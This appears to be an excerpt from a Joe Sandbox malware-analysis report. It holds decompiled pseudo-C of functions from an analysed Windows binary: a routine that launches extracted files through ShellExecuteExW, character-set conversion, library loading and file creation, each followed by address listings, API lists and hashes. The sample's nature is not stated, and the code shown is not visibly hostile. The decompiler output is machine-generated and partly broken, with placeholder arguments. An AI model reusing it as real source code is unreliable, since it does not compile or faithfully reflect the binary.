                                                    			E00CDD78F(void* __ebp, struct _SHELLEXECUTEINFOW _a4, char* _a8, char* _a16, signed short* _a20, signed short* _a24, intOrPtr _a32, void* _a48, char _a52, intOrPtr _a56, char _a64, struct HWND__* _a4160, void* _a4164, signed short* _a4168, intOrPtr _a4172, intOrPtr _a4176) {
				long _v12;
				void* __edi;
				int _t47;
				signed int _t50;
				void* _t51;
				signed short* _t53;
				long _t64;
				signed int _t71;
				void* _t72;
				signed short _t73;
				int _t74;
				void* _t76;
				signed int _t77;
				intOrPtr _t78;
				long _t80;
				signed int _t81;
				void* _t82;
				void* _t84;
				signed int _t86;
				signed short* _t87;
				struct HWND__* _t88;
				void* _t89;
				void* _t92;

				_t89 = __ebp;
				_t47 = E00CDEC50(0x1040);
				_t87 = _a4168;
				_t74 = 0;
				if( *_t87 == 0) {
					L54:
					return _t47;
				}
				_t47 = E00CE3E13(_t87);
				if(_t47 >= 0x7f6) {
					goto L54;
				} else {
					_t80 = 0x3c;
					E00CDFFF0(_t80,  &_a4, 0, _t80);
					_t78 = _a4176;
					_t92 = _t92 + 0xc;
					_a4.cbSize = _t80;
					_a8 = 0x1c0;
					if(_t78 != 0) {
						_a8 = 0x5c0;
					}
					_t50 =  *_t87 & 0x0000ffff;
					_push(_t89);
					_t76 = 0x22;
					_t81 = _t50;
					_t77 = _t74;
					if(_t50 != _t76) {
						_t90 = _t87;
						_a20 = _t87;
						goto L16;
					} else {
						_t90 =  &(_t87[1]);
						_a20 =  &(_t87[1]);
						L6:
						_t51 = 0x22;
						if(_t81 != _t51) {
							L13:
							_t82 = 0x20;
							_t53 =  &(( &(_t87[1]))[_t77]);
							if(_t87[_t77] == _t82) {
								_t87[_t77] = 0;
								L48:
								_a24 = _t53;
								L18:
								if(_t53 == 0 ||  *_t53 == _t74) {
									if(_t78 == 0 &&  *0xd0b472 != _t74) {
										_a24 = 0xd0b472;
									}
								}
								_a32 = _a4172;
								_t84 = E00CCB92D(_t90);
								if(_t84 != 0 && E00CD1FBB(_t84, L".inf") == 0) {
									_a16 = L"Install";
								}
								if(E00CCA231(_a20) != 0) {
									E00CCB6C4(_a20,  &_a64, 0x800);
									_a8 =  &_a52;
								}
								_t47 = ShellExecuteExW( &_a4); // executed
								if(_t47 != 0) {
									_t88 = _a4160;
									if( *0xd09468 != _t74 || _a4172 != _t74 ||  *0xd17b7a != _t74) {
										if(_t88 != 0) {
											_push(_t88);
											if( *0xd230a8() != 0) {
												ShowWindow(_t88, _t74);
												_t74 = 1;
											}
										}
										 *0xd230a4(_a56, 0x7d0);
										E00CDDC3B(_a48);
										if( *0xd17b7a != 0 && _a4164 == 0 && GetExitCodeProcess(_a48,  &_v12) != 0) {
											_t64 = _v12;
											if(_t64 >  *0xd1fca4) {
												 *0xd1fca4 = _t64;
											}
											 *0xd17b7b = 1;
										}
									}
									CloseHandle(_a48);
									if(_t84 == 0 || E00CD1FBB(_t84, L".exe") != 0) {
										_t47 = _a4164;
										if( *0xd09468 != 0 && _t47 == 0 &&  *0xd17b7a == _t47) {
											 *0xd1fca8 = 0x1b58;
										}
									} else {
										_t47 = _a4164;
									}
									if(_t74 != 0 && _t47 != 0) {
										_t47 = ShowWindow(_t88, 1);
									}
								}
								goto L54;
							}
							if( *_t53 == 0x2f) {
								goto L48;
							}
							_t77 = _t77 + 1;
							_t50 = _t87[_t77] & 0x0000ffff;
							_t81 = _t50;
							L16:
							if(_t50 != 0) {
								goto L6;
							}
							_t53 = _a24;
							goto L18;
						} else {
							while(1) {
								_t77 = _t77 + 1;
								_t71 = _t87[_t77] & 0x0000ffff;
								_t86 = _t71;
								if(_t71 == 0) {
									break;
								}
								_t72 = 0x22;
								if(_t86 == _t72) {
									_t73 = 0x20;
									_t87[_t77] = _t73;
									goto L13;
								}
							}
							goto L13;
						}
					}
				}
			}


























                                                    0x00cdd78f
                                                    0x00cdd794
                                                    0x00cdd79b
                                                    0x00cdd7a2
                                                    0x00cdd7a7
                                                    0x00cdd9ea
                                                    0x00cdd9f0
                                                    0x00cdd9f0
                                                    0x00cdd7ae
                                                    0x00cdd7b9
                                                    0x00000000
                                                    0x00cdd7bf
                                                    0x00cdd7c2
                                                    0x00cdd7ca
                                                    0x00cdd7cf
                                                    0x00cdd7d6
                                                    0x00cdd7d9
                                                    0x00cdd7dd
                                                    0x00cdd7e7
                                                    0x00cdd7e9
                                                    0x00cdd7e9
                                                    0x00cdd7f1
                                                    0x00cdd7f4
                                                    0x00cdd7f7
                                                    0x00cdd7fb
                                                    0x00cdd7fd
                                                    0x00cdd7ff
                                                    0x00cdd812
                                                    0x00cdd814
                                                    0x00000000
                                                    0x00cdd801
                                                    0x00cdd801
                                                    0x00cdd804
                                                    0x00cdd808
                                                    0x00cdd80a
                                                    0x00cdd80e
                                                    0x00cdd837
                                                    0x00cdd839
                                                    0x00cdd83d
                                                    0x00cdd844
                                                    0x00cdd9c2
                                                    0x00cdd9c6
                                                    0x00cdd9c6
                                                    0x00cdd864
                                                    0x00cdd866
                                                    0x00cdd86f
                                                    0x00cdd87a
                                                    0x00cdd87a
                                                    0x00cdd86f
                                                    0x00cdd88a
                                                    0x00cdd893
                                                    0x00cdd898
                                                    0x00cdd8a9
                                                    0x00cdd8a9
                                                    0x00cdd8bc
                                                    0x00cdd8cc
                                                    0x00cdd8d5
                                                    0x00cdd8d5
                                                    0x00cdd8de
                                                    0x00cdd8e6
                                                    0x00cdd8ec
                                                    0x00cdd8f9
                                                    0x00cdd90e
                                                    0x00cdd910
                                                    0x00cdd919
                                                    0x00cdd91d
                                                    0x00cdd923
                                                    0x00cdd923
                                                    0x00cdd919
                                                    0x00cdd92e
                                                    0x00cdd938
                                                    0x00cdd944
                                                    0x00cdd963
                                                    0x00cdd96d
                                                    0x00cdd96f
                                                    0x00cdd96f
                                                    0x00cdd974
                                                    0x00cdd974
                                                    0x00cdd944
                                                    0x00cdd97f
                                                    0x00cdd987
                                                    0x00cdd99f
                                                    0x00cdd9a6
                                                    0x00cdd9b4
                                                    0x00cdd9b4
                                                    0x00cdd9cf
                                                    0x00cdd9cf
                                                    0x00cdd9cf
                                                    0x00cdd9d8
                                                    0x00cdd9e1
                                                    0x00cdd9e1
                                                    0x00cdd9d8
                                                    0x00000000
                                                    0x00cdd9e7
                                                    0x00cdd84e
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdd854
                                                    0x00cdd855
                                                    0x00cdd859
                                                    0x00cdd85b
                                                    0x00cdd85e
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdd860
                                                    0x00000000
                                                    0x00cdd810
                                                    0x00cdd822
                                                    0x00cdd822
                                                    0x00cdd823
                                                    0x00cdd827
                                                    0x00cdd82c
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdd81c
                                                    0x00cdd820
                                                    0x00cdd832
                                                    0x00cdd833
                                                    0x00000000
                                                    0x00cdd833
                                                    0x00cdd820
                                                    0x00000000
                                                    0x00cdd82e
                                                    0x00cdd80e
                                                    0x00cdd7ff

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                    • String ID: .exe$.inf
                                                    • API String ID: 36480843-3750412487
                                                    • Opcode ID: 87453b002db86c40a659e2c800f7ef342ebe0ee506f426d07a54be5e5bc56c3b
                                                    • Instruction ID: 1525631867463765d6fb796b0d1692b15002b5d3019f9c281ffe5244e3842a1b
                                                    • Opcode Fuzzy Hash: 87453b002db86c40a659e2c800f7ef342ebe0ee506f426d07a54be5e5bc56c3b
                                                    • Instruction Fuzzy Hash: FE51C370808380AAD7319F64A854BBBBBE4AF41744F04041FF7D6973A1DB729B85D762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CEA95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 911 cea95b-cea974 912 cea98a-cea98f 911->912 913 cea976-cea986 call ceef4c 911->913 915 cea99c-cea9c0 MultiByteToWideChar 912->915 916 cea991-cea999 912->916 913->912 921 cea988 913->921 918 cea9c6-cea9d2 915->918 919 ceab53-ceab66 call cdfbbc 915->919 916->915 922 ceaa26 918->922 923 cea9d4-cea9e5 918->923 921->912 927 ceaa28-ceaa2a 922->927 924 cea9e7-cea9f6 call cf2010 923->924 925 ceaa04-ceaa15 call ce8e06 923->925 930 ceab48 924->930 936 cea9fc-ceaa02 924->936 925->930 937 ceaa1b 925->937 927->930 931 ceaa30-ceaa43 MultiByteToWideChar 927->931 935 ceab4a-ceab51 call ceabc3 930->935 931->930 934 ceaa49-ceaa5b call ceaf6c 931->934 941 ceaa60-ceaa64 934->941 935->919 940 ceaa21-ceaa24 936->940 937->940 940->927 941->930 943 ceaa6a-ceaa71 941->943 944 ceaaab-ceaab7 943->944 945 ceaa73-ceaa78 943->945 947 ceaab9-ceaaca 944->947 948 ceab03 944->948 945->935 946 ceaa7e-ceaa80 945->946 946->930 949 ceaa86-ceaaa0 call ceaf6c 946->949 951 ceaacc-ceaadb call cf2010 947->951 952 ceaae5-ceaaf6 call ce8e06 947->952 950 ceab05-ceab07 948->950 949->935 963 ceaaa6 949->963 954 ceab09-ceab22 call ceaf6c 950->954 955 ceab41-ceab47 call ceabc3 950->955 951->955 966 ceaadd-ceaae3 951->966 952->955 967 ceaaf8 952->967 954->955 969 ceab24-ceab2b 954->969 955->930 963->930 968 ceaafe-ceab01 966->968 967->968 968->950 970 ceab2d-ceab2e 969->970 971 ceab67-ceab6d 969->971 972 ceab2f-ceab3f WideCharToMultiByte 970->972 971->972 972->955 973 ceab6f-ceab76 call ceabc3 972->973 973->935
                                                    C-Code - Quality: 70%
                                                    			E00CEA95B(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t49;
				signed int _t54;
				int _t57;
				signed int _t59;
				short* _t61;
				signed int _t65;
				short* _t70;
				int _t79;
				void* _t81;
				short* _t82;
				signed int _t88;
				signed int _t91;
				void* _t96;
				int _t98;
				void* _t99;
				short* _t101;
				int _t103;
				void* _t104;
				int _t105;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0xcfe7ac; // 0x349e4b74
				_v8 = _t49 ^ _t106;
				_t103 = _a20;
				if(_t103 > 0) {
					_t79 = E00CEEF4C(_a16, _t103);
					_t110 = _t79 - _t103;
					_t4 = _t79 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t79;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					_pop(_t99);
					_pop(_t104);
					_pop(_t81);
					return E00CDFBBC(_t54, _t81, _v8 ^ _t106, _t96, _t99, _t104);
				} else {
					_t96 = _t54 + _t54;
					_t86 = _t96 + 8;
					asm("sbb eax, eax");
					if((_t96 + 0x00000008 & _t54) == 0) {
						_t82 = 0;
						__eflags = 0;
						L14:
						if(_t82 == 0) {
							L36:
							_t105 = 0;
							L37:
							E00CEABC3(_t82);
							_t54 = _t105;
							goto L38;
						}
						_t57 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t82, _v12);
						_t121 = _t57;
						if(_t57 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t59 = E00CEAF6C(_t82, _t86, _v12, _t121, _a8, _a12, _t82, _v12, 0, 0, 0, 0, 0); // executed
						_t105 = _t59;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t88 = _t96 + 8;
							__eflags = _t96 - _t88;
							asm("sbb eax, eax");
							__eflags = _t88 & _t59;
							if((_t88 & _t59) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E00CEABC3(_t101);
									goto L36;
								}
								_t61 = E00CEAF6C(_t82, _t88, _t101, __eflags, _a8, _a12, _t82, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t61;
								if(_t61 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E00CEABC3(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t91 = _t96 + 8;
							__eflags = _t96 - _t91;
							asm("sbb eax, eax");
							_t65 = _t59 & _t91;
							_t88 = _t96 + 8;
							__eflags = _t65 - 0x400;
							if(_t65 > 0x400) {
								__eflags = _t96 - _t88;
								asm("sbb eax, eax");
								_t101 = E00CE8E06(_t88, _t65 & _t88);
								_pop(_t88);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t88;
							asm("sbb eax, eax");
							E00CF2010(_t65 & _t88);
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t105 = E00CEAF6C(_t82, 0, _t100, _t125, _a8, _a12, _t82, _t100, _a24, _t70, 0, 0, 0);
						if(_t105 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t96 + 0x00000008;
					_t86 = _t96 + 8;
					if((_t54 & _t96 + 0x00000008) > 0x400) {
						__eflags = _t96 - _t86;
						asm("sbb eax, eax");
						_t82 = E00CE8E06(_t86, _t72 & _t86);
						_pop(_t86);
						__eflags = _t82;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t82 = 0xdddd;
						L12:
						_t82 =  &(_t82[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00CF2010(_t72 & _t86);
					_t82 = _t107;
					if(_t82 == 0) {
						goto L36;
					}
					 *_t82 = 0xcccc;
					goto L12;
				}
			}































                                                    0x00cea960
                                                    0x00cea961
                                                    0x00cea962
                                                    0x00cea969
                                                    0x00cea96e
                                                    0x00cea974
                                                    0x00cea97a
                                                    0x00cea980
                                                    0x00cea983
                                                    0x00cea983
                                                    0x00cea986
                                                    0x00cea988
                                                    0x00cea988
                                                    0x00cea986
                                                    0x00cea98a
                                                    0x00cea98f
                                                    0x00cea996
                                                    0x00cea999
                                                    0x00cea999
                                                    0x00cea9b5
                                                    0x00cea9bb
                                                    0x00cea9c0
                                                    0x00ceab53
                                                    0x00ceab56
                                                    0x00ceab57
                                                    0x00ceab58
                                                    0x00ceab66
                                                    0x00cea9c6
                                                    0x00cea9c6
                                                    0x00cea9c9
                                                    0x00cea9ce
                                                    0x00cea9d2
                                                    0x00ceaa26
                                                    0x00ceaa26
                                                    0x00ceaa28
                                                    0x00ceaa2a
                                                    0x00ceab48
                                                    0x00ceab48
                                                    0x00ceab4a
                                                    0x00ceab4b
                                                    0x00ceab51
                                                    0x00000000
                                                    0x00ceab51
                                                    0x00ceaa3b
                                                    0x00ceaa41
                                                    0x00ceaa43
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceaa49
                                                    0x00ceaa5b
                                                    0x00ceaa60
                                                    0x00ceaa64
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceaa71
                                                    0x00ceaaab
                                                    0x00ceaaae
                                                    0x00ceaab1
                                                    0x00ceaab3
                                                    0x00ceaab5
                                                    0x00ceaab7
                                                    0x00ceab03
                                                    0x00ceab03
                                                    0x00ceab05
                                                    0x00ceab05
                                                    0x00ceab07
                                                    0x00ceab41
                                                    0x00ceab42
                                                    0x00000000
                                                    0x00ceab47
                                                    0x00ceab1b
                                                    0x00ceab20
                                                    0x00ceab22
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceab26
                                                    0x00ceab27
                                                    0x00ceab28
                                                    0x00ceab2b
                                                    0x00ceab67
                                                    0x00ceab6a
                                                    0x00ceab2d
                                                    0x00ceab2d
                                                    0x00ceab2e
                                                    0x00ceab2e
                                                    0x00ceab3b
                                                    0x00ceab3d
                                                    0x00ceab3f
                                                    0x00ceab70
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceab3f
                                                    0x00ceaab9
                                                    0x00ceaabc
                                                    0x00ceaabe
                                                    0x00ceaac0
                                                    0x00ceaac2
                                                    0x00ceaac5
                                                    0x00ceaaca
                                                    0x00ceaae5
                                                    0x00ceaae7
                                                    0x00ceaaf1
                                                    0x00ceaaf3
                                                    0x00ceaaf4
                                                    0x00ceaaf6
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceaaf8
                                                    0x00ceaafe
                                                    0x00ceaafe
                                                    0x00000000
                                                    0x00ceaafe
                                                    0x00ceaacc
                                                    0x00ceaace
                                                    0x00ceaad2
                                                    0x00ceaad7
                                                    0x00ceaad9
                                                    0x00ceaadb
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceaadd
                                                    0x00000000
                                                    0x00ceaadd
                                                    0x00ceaa73
                                                    0x00ceaa78
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceaa7e
                                                    0x00ceaa80
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceaa9c
                                                    0x00ceaaa0
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceaaa6
                                                    0x00cea9d9
                                                    0x00cea9db
                                                    0x00cea9dd
                                                    0x00cea9e5
                                                    0x00ceaa04
                                                    0x00ceaa06
                                                    0x00ceaa10
                                                    0x00ceaa12
                                                    0x00ceaa13
                                                    0x00ceaa15
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceaa1b
                                                    0x00ceaa21
                                                    0x00ceaa21
                                                    0x00000000
                                                    0x00ceaa21
                                                    0x00cea9e9
                                                    0x00cea9ed
                                                    0x00cea9f2
                                                    0x00cea9f6
                                                    0x00000000
                                                    0x00000000
                                                    0x00cea9fc
                                                    0x00000000
                                                    0x00cea9fc

                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00CE57FB,00CE57FB,?,?,?,00CEABAC,00000001,00000001,2DE85006), ref: 00CEA9B5
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00CEABAC,00000001,00000001,2DE85006,?,?,?), ref: 00CEAA3B
                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00CEAB35
                                                    • __freea.LIBCMT ref: 00CEAB42
                                                      • Part of subcall function 00CE8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CE4286,?,0000015D,?,?,?,?,00CE5762,000000FF,00000000,?,?), ref: 00CE8E38
                                                    • __freea.LIBCMT ref: 00CEAB4B
                                                    • __freea.LIBCMT ref: 00CEAB70
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1414292761-0
                                                    • Opcode ID: a260ab546d44d10747a9d9b9e51c52c43335d81079f5d8a242c51186c85f6734
                                                    • Instruction ID: 394873555f12b319fb3a7ed021e714bbc15fae949e484ff91a9df56f4cc9c751
                                                    • Opcode Fuzzy Hash: a260ab546d44d10747a9d9b9e51c52c43335d81079f5d8a242c51186c85f6734
                                                    • Instruction Fuzzy Hash: 1E511372600296AFDB258F66CC81FBFB7AAEB44710F154629FC14D7150EB34ED40E6A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CE3B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 976 ce3b72-ce3b7c 977 ce3bee-ce3bf1 976->977 978 ce3b7e-ce3b8c 977->978 979 ce3bf3 977->979 981 ce3b8e-ce3b91 978->981 982 ce3b95-ce3bb1 LoadLibraryExW 978->982 980 ce3bf5-ce3bf9 979->980 983 ce3c09-ce3c0b 981->983 984 ce3b93 981->984 985 ce3bfa-ce3c00 982->985 986 ce3bb3-ce3bbc GetLastError 982->986 983->980 988 ce3beb 984->988 985->983 987 ce3c02-ce3c03 FreeLibrary 985->987 989 ce3bbe-ce3bd3 call ce6088 986->989 990 ce3be6-ce3be9 986->990 987->983 988->977 989->990 993 ce3bd5-ce3be4 LoadLibraryExW 989->993 990->988 993->985 993->990
                                                    C-Code - Quality: 100%
                                                    			E00CE3B72(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0xd220e0 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0xcf62b4 + _t11 * 4);
						_v8 = _t12;
						_t13 = LoadLibraryExW(_t12, 0, 0x800); // executed
						_t29 = _t13;
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E00CE6088(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}














                                                    0x00ce3b79
                                                    0x00ce3bee
                                                    0x00ce3b7e
                                                    0x00ce3b80
                                                    0x00ce3b87
                                                    0x00ce3b8c
                                                    0x00ce3b95
                                                    0x00ce3ba4
                                                    0x00ce3ba7
                                                    0x00ce3bad
                                                    0x00ce3bb1
                                                    0x00ce3bfa
                                                    0x00ce3bfc
                                                    0x00ce3c00
                                                    0x00ce3c03
                                                    0x00ce3c03
                                                    0x00ce3c09
                                                    0x00ce3c09
                                                    0x00ce3bf5
                                                    0x00ce3bf9
                                                    0x00ce3bf9
                                                    0x00ce3bb3
                                                    0x00ce3bbc
                                                    0x00ce3be6
                                                    0x00ce3be9
                                                    0x00ce3beb
                                                    0x00ce3beb
                                                    0x00000000
                                                    0x00ce3beb
                                                    0x00ce3bbe
                                                    0x00ce3bc9
                                                    0x00ce3bce
                                                    0x00ce3bd3
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce3bda
                                                    0x00ce3be0
                                                    0x00ce3be4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce3be4
                                                    0x00ce3b91
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce3b93
                                                    0x00ce3bf3
                                                    0x00000000

                                                    APIs
                                                    • FreeLibrary.KERNEL32(00000000,?,?,00CE3C35,00000000,00000FA0,00D22088,00000000,?,00CE3D60,00000004,InitializeCriticalSectionEx,00CF6394,InitializeCriticalSectionEx,00000000), ref: 00CE3C03
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID: api-ms-
                                                    • API String ID: 3664257935-2084034818
                                                    • Opcode ID: c8f5b90733b041a78d2b2a80cd3db84610ddc265065d44450aea105eb998f83f
                                                    • Instruction ID: 46a680e3441b0d8576348b3d588e429533b6d074818922ee032e357d82fbd051
                                                    • Opcode Fuzzy Hash: c8f5b90733b041a78d2b2a80cd3db84610ddc265065d44450aea105eb998f83f
                                                    • Instruction Fuzzy Hash: 3F11A731A452E5ABCB218B6A9C49B6E37649F01770F250211E926EB2D0D775FF00C6D2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC98E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 994 cc98e0-cc9901 call cdec50 997 cc990c 994->997 998 cc9903-cc9906 994->998 1000 cc990e-cc991f 997->1000 998->997 999 cc9908-cc990a 998->999 999->1000 1001 cc9927-cc9931 1000->1001 1002 cc9921 1000->1002 1003 cc9936-cc9943 call cc6edb 1001->1003 1004 cc9933 1001->1004 1002->1001 1007 cc994b-cc996a CreateFileW 1003->1007 1008 cc9945 1003->1008 1004->1003 1009 cc996c-cc998e GetLastError call ccbb03 1007->1009 1010 cc99bb-cc99bf 1007->1010 1008->1007 1014 cc99c8-cc99cd 1009->1014 1016 cc9990-cc99b3 CreateFileW GetLastError 1009->1016 1012 cc99c3-cc99c6 1010->1012 1012->1014 1015 cc99d9-cc99de 1012->1015 1014->1015 1017 cc99cf 1014->1017 1018 cc99ff-cc9a10 1015->1018 1019 cc99e0-cc99e3 1015->1019 1016->1012 1020 cc99b5-cc99b9 1016->1020 1017->1015 1022 cc9a2e-cc9a39 1018->1022 1023 cc9a12-cc9a2a call cd0602 1018->1023 1019->1018 1021 cc99e5-cc99f9 SetFileTime 1019->1021 1020->1012 1021->1018 1023->1022
                                                    C-Code - Quality: 97%
                                                    			E00CC98E0(void* __ecx, void* __esi, signed int _a4, short _a8, WCHAR* _a4180, unsigned int _a4184) {
				struct _FILETIME _v0;
				char _t38;
				void* _t40;
				long _t52;
				unsigned int _t53;
				long _t56;
				signed int _t57;
				void* _t61;
				void* _t62;
				long _t68;
				void* _t70;

				_t62 = __esi;
				E00CDEC50(0x1050);
				_t53 = _a4184;
				_t61 = __ecx;
				 *(__ecx + 0x1034) =  *(__ecx + 0x1034) & 0x00000000;
				if( *((char*)(__ecx + 0x30)) != 0 || (_t53 & 0x00000004) != 0) {
					_t38 = 1;
				} else {
					_t38 = 0;
				}
				_push(_t62);
				_t68 = ( !(_t53 >> 1) & 0x00000001) + 1 << 0x1e;
				if((_t53 & 0x00000001) != 0) {
					_t68 = _t68 | 0x40000000;
				}
